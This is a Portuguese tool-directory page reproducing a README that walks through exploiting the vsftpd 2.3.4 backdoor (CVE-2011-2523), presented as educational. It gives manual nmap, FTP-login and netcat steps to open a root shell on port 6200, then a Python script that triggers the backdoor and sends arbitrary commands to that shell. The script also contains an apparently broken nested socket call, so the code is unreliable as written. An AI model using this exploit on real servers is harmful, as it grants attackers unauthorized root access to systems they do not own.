Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523) uma vulnerabilidade crítica que leva a uma Reverse Root Shell. Neste repositório, farei uma PoC de como explorá-la passo a passo, manualmente e automaticamente (Python), para fins educacionais. | Kitploit
Ferramentas/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) uma vulnerabilidade crítica que leva a uma Reverse Root Shell. Neste repositório, farei uma PoC de como explorá-la passo a passo, manualmente e automaticamente (Python), para fins educacionais.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 6 mesesAinda não revisado

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) uma vulnerabilidade crítica que leva a um Root Shell. Neste repositório vou fazer um PoC de como explorá-la passo a passo, Manualmente e Automaticamente (Python), para fins educacionais.

Sobre o que é a vulnerabilidade? Primeiramente, é um exploit do lado do serviço, então vamos explorá-lo remotamente. A ideia é que, quando você se conecta ao serviço FTP na porta padrão 21 usando um nome de usuário contendo :), isso faz o sistema abrir uma porta TCP 6200 com um Root Shell, de modo que qualquer um pode se conectar a ela e ter acesso root ao servidor alvo, o que é um desastre. Então vamos fazer isso na prática, passo a passo. Vou explicar manualmente primeiro para ter a ideia completa e depois há um script Python para explorá-la automaticamente.

Manualmente

Varredura de portas

  1. porta 21 aberta
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP 
image
  1. porta 6200 fechada
root@kitploit:~
nmap -p6200 Target_IP
  • A porta 6200 está fechada por enquanto image

Exploração

  1. Conecte-se ao serviço FTP e use um nome de usuário malicioso para fazer o sistema abrir a porta 6200
root@kitploit:~
ftp Target_IP 
  • Usuário: anything:)
  • Senha: anything image
  1. Verifique a porta 6200 após a conexão FTP
root@kitploit:~
nmap -p6200 Target_IP

A porta 6200 está aberta agora, então esta é a nossa backdoor

image
  1. Conecte-se à porta 6200 para obter um Root Shell em todo o servidor
root@kitploit:~
nc -nv Target_IP 6200

Finalmente, temos um Root Shell na máquina alvo. image


Automaticamente

Depois de fazermos manualmente, sabemos os passos do exploit:

  1. Conecte-se ao servidor FTP na porta (21).
  2. Use um nome de usuário contendo :) para acionar a backdoor.
  3. Conecte-se à porta (6200).
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
Baixar ferramenta